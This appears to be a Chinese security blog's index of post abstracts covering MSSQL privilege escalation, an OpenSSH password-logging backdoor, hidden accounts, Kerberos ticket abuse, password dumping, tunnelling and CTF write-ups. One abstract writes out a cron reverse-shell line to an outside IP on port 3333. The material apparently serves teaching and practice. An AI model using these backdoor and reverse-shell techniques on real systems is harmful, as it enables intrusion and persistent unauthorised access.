mushangqiujin

摘要： 数据库帐号密码获取方式： 1.网站存在高权限SQL注入点 2.数据库的存储文件或备份文件 3.网站源码中的数据库配置文件(常见方式) 4.采用工具或脚本爆破(需解决外联问题) 一、mssql提权 sa默认开启外来联 环境：win2003 iis+msssql2008 1.使用xp_cmdshell进 阅读全文

摘要： 0x01替换版本-OpenSSH后门 原理：替换本身操作系统的ssh协议支撑软件openssh，重新安装自定义的openssh,达到记录帐号密码，也可以采用万能密码连接的功能！ 可以修改软件版本和删除安装记录 1.环境准备： yum -y install openssl openssl-devel 阅读全文

摘要： 1.信息搜集 本题共三个key 端口 1433 27689 存活ip 192.168.85.137 2.访问网站27689进行信息搜集 一个登录框，sql注入失败，暴力破解失败 扫描目录 发现三个文件robots.txt ,web.config 除了robots.txt,其他都访问不了 访问robo 阅读全文

摘要： 0x01权限维持-隐藏用户 CreateHiddenAccount工具 CreateHiddenAccount -u test -p P@sswrd 用户管理能查看到，命令查看看不到，单机版无法删除(不在任何组)，域环境(在administrator组中)可以删除 0x02权限维持-黄金白银票据 ⻩ 阅读全文

摘要： 0x01-定时任务-Cron后门 利用系统的定时任务功能进行反弹Shell 1.编辑后门反弹 vim /etc/.xiaodi.sh #!/bin/bash bash -i >& /dev/tcp/47.94.236.117/3333 0>&1 chmod +x /etc/.1.sh 2.添加定时任 阅读全文

摘要： 1.web131 和上题一样差不多，正则最大回溯次数绕过 import requests url="" data={'f':'very'*250000+'360Dctfshow' } r=requests.post(url,data=data) print(r.text) 2.web132 通过扫描 阅读全文

摘要： 0x01 横向移动-非约束委派 原理： 机器A（域控）访问具有非约束委派权限的机器B的服务，会把当前认证用户（域管用户）的的TGT放在ST票据中，一起发送给机器B，机器B会把TGT存储在lsass进程中以备下次重用。从而机器B就能使用这个TGT模拟认证用户（域管用户）访问服务 利用场景 攻击者拿到了 阅读全文

摘要： 0x00 说明 微软为了防止明文密码泄露发布了补丁KB2871997，关闭了Wdigest功能。 当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，此时可以通过修改注册表的方式抓取明文，但需要用户重新登录后才能成功抓取。 windows读取密码出现的情况 强开注册表，可以读取 阅读全文

摘要： 0x01 隧道 隐藏隧道通信技术，跟vpn很类似，主要是为了对抗安全设备的，FW,WAF,IPS,态势感知SIP(探针),还可以与不能通信的内网机器进行通信,隧道只能一个端口一个端口的进行通信。 隧道类型： 网络层：ipv4，ipv6，icmp 传输层：tcp，udp，端口转发 应用层：ssh，ht 阅读全文

摘要： 1.web54 正则加入了.*尽可能多匹配,flag绕过方式就不可以了，但是可以用？代替，nl也被匹配了 比如说cat，.*当出现cat这个整体时才会进行匹配，会尽可能匹配较多字符，ca，c之类的字符不会进行匹配，tac为什么不能用t??,是因为还有一个跟它一样长度的命令top payload： c 阅读全文